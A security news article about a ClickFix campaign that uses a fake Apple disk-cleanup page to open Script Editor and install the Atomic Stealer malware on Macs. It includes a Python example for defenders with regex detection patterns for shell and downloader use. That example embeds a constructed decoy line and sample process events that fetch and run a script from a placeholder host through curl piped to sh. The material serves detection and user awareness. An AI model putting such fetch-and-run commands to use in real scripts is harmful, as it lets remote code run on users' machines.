Recent findings by security researchers reveal a new ClickFix attack vector specifically targeting Mac users through a fraudulent Apple-themed webpage. This malicious site falsely claims to provide instructions on how to reclaim disk space on a Mac, luring unsuspecting victims into executing harmful commands.
The ClickFix technique is a form of social engineering that deceives users into executing malicious commands on their devices, often under the pretense of resolving issues or performing routine maintenance tasks. Initially directed at Windows users, this technique has increasingly targeted macOS and Linux systems as well.
Until now, the primary ClickFix method on macOS has been to talk the victim into copying a command from the page and pasting it into Terminal, a practice Apple set out to blunt with a security feature introduced in macOS 26.4 that inspects pasted commands before Terminal runs them. That check only covers the Terminal path, so attackers have adapted.
Their new approach uses a browser-triggered workflow that opens Script Editor, the editor bundled with macOS for AppleScript and JavaScript for Automation (JXA), with the attacker's script already loaded. The victim never touches Terminal, so the paste check never applies; the script runs from Script Editor instead.
The Mechanics of the Attack
From the perspective of a victim, the attack unfolds in several steps:
- Users visit the deceptive webpage and follow its misleading instructions.
- They click on the “Execute” button provided on the site.
- A prompt appears, requesting permission for the website to open Script Editor.
- Upon approval, Script Editor opens, pre-filled with the malicious script crafted by the attackers.
- Depending on their macOS version, users may see a warning about executing the script.
- If they disregard the warning and permit the script to run, it will discreetly download and execute a variant of the Atomic Stealer malware, also known as AMOS.
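Two things a defender can check against the flow above are the script itself and what it spawns. The block below is an added example, not code from the page, from Jamf or from Apple. It does a static triage of an AppleScript/JXA source (the text that lands pre-filled in Script Editor), flagging constructs a "reclaim disk space" helper has no reason to contain, and a process-lineage pass over endpoint exec events that flags shells or downloaders descended from Script Editor or osascript, which is what `do shell script` produces because it runs its command through /bin/sh. The sample script, the process tree, the pids and the `example.invalid` hostname are all constructed for the example and are not indicators from the campaign.

```python
"""Triage helpers for the browser-to-Script-Editor ClickFix flow.

Added example; not code from the page, Jamf or Apple. All sample inputs
below are constructed and the hostname/paths are placeholders.
"""
import re
from dataclasses import dataclass

# Constructs in AppleScript / JXA that spawn a shell, fetch content or decode
# an embedded payload. The dict keys double as finding labels.
SUSPICIOUS_PATTERNS = {
    "shell_exec": re.compile(r"\bdo shell script\b|\bdoShellScript\b", re.I),
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash|zsh)\b"),
    "base64_decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "admin_prompt": re.compile(r"with administrator privileges", re.I),
    "password_dialog": re.compile(r"display dialog[^\n]*hidden answer", re.I),
    "temp_path": re.compile(r"/tmp/|\$TMPDIR|/var/folders/"),
}


def triage_script(source: str) -> list[str]:
    """Return the suspicious constructs present in an AppleScript/JXA source."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(source)]


def severity(findings: list[str]) -> str:
    """Shell execution combined with fetch-or-decode is the dropper shape."""
    fetch_or_decode = {"downloader", "pipe_to_shell", "base64_decode"}
    if "shell_exec" in findings and fetch_or_decode & set(findings):
        return "high"
    return "medium" if findings else "low"


@dataclass(frozen=True)
class ExecEvent:
    """Minimal process-exec record, the shape an EDR or EndpointSecurity feed gives."""
    pid: int
    ppid: int
    name: str
    argv: str


SCRIPT_RUNNERS = {"Script Editor", "osascript"}
SHELLS_AND_FETCHERS = {"sh", "bash", "zsh", "curl", "wget"}


def script_runner_descendants(events: list[ExecEvent]) -> list[ExecEvent]:
    """Shells or downloaders with Script Editor/osascript somewhere in their ancestry.

    `do shell script` executes through /bin/sh, so a curl launched from a
    script appears as Script Editor -> sh -> curl. Ancestry is walked by pid
    within the supplied events and stops at a parent that is absent or not
    a script runner (e.g. launchd).
    """
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.name not in SHELLS_AND_FETCHERS:
            continue
        parent = by_pid.get(e.ppid)
        seen = set()
        while parent and parent.pid not in seen:
            if parent.name in SCRIPT_RUNNERS:
                hits.append(e)
                break
            seen.add(parent.pid)
            parent = by_pid.get(parent.ppid)
    return hits


# --- constructed samples (not real indicators) ----------------------------

# Shape of a decoy "free up disk space" script a ClickFix page might pre-fill.
DECOY_SCRIPT = '''display dialog "Cleaning caches..." buttons {"OK"}
do shell script "curl -fsSL https://example.invalid/cleanup.sh | sh"'''

# A harmless script that only reports free space via Finder.
BENIGN_SCRIPT = '''tell application "Finder" to get free space of startup disk'''

# Process tree as an endpoint sensor would report it; pids are made up.
SAMPLE_EVENTS = [
    ExecEvent(1, 0, "launchd", "/sbin/launchd"),
    ExecEvent(410, 1, "Safari", "/Applications/Safari.app/Contents/MacOS/Safari"),
    ExecEvent(522, 1, "Script Editor", "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"),
    ExecEvent(530, 522, "sh", "/bin/sh -c curl -fsSL https://example.invalid/cleanup.sh | sh"),
    ExecEvent(531, 530, "curl", "curl -fsSL https://example.invalid/cleanup.sh"),
    ExecEvent(532, 530, "sh", "sh"),
    ExecEvent(600, 1, "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    ExecEvent(601, 600, "zsh", "-zsh"),
]

if __name__ == "__main__":
    for label, src in (("decoy", DECOY_SCRIPT), ("benign", BENIGN_SCRIPT)):
        found = triage_script(src)
        print(f"{label}: {severity(found)} {found}")
    for e in script_runner_descendants(SAMPLE_EVENTS):
        print(f"pid {e.pid} {e.name}: {e.argv}")
```

The lineage check deliberately looks downward from Script Editor rather than upward to the browser: an app opened by a browser through a URL handler is started by Launch Services, so its parent pid is launchd, not Safari or Chrome, and a naive "browser spawned Script Editor" rule will miss it. Script Editor or osascript spawning `sh` and then `curl` is the part of the chain that the script itself cannot avoid, which is why it is the better detection anchor; the static triage covers the case where the script is captured before it ever runs.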
Atomic Stealer is a subscription-based malware product marketed to criminals, allowing them to harvest sensitive information from infected systems. This malware is capable of collecting a wide range of data, including system details, credentials stored in Keychain (Apple's password management system), autofill data, passwords, cookies, and credit card information from web browsers, as well as data from cryptocurrency wallets.
Researchers from Jamf, who documented the campaign, have published indicators of compromise for this delivery chain. A practical rule for users: no legitimate maintenance guide needs you to approve a website opening Script Editor or to paste a command into Terminal, so treat any site that asks for either as hostile, whatever fix it promises.
As cyber threats continue to evolve, it is crucial for users to stay informed about the latest tactics employed by attackers. Subscribing to security alerts can help ensure that individuals are aware of potential risks and can take proactive measures to protect their data and devices.
Source: Help Net Security News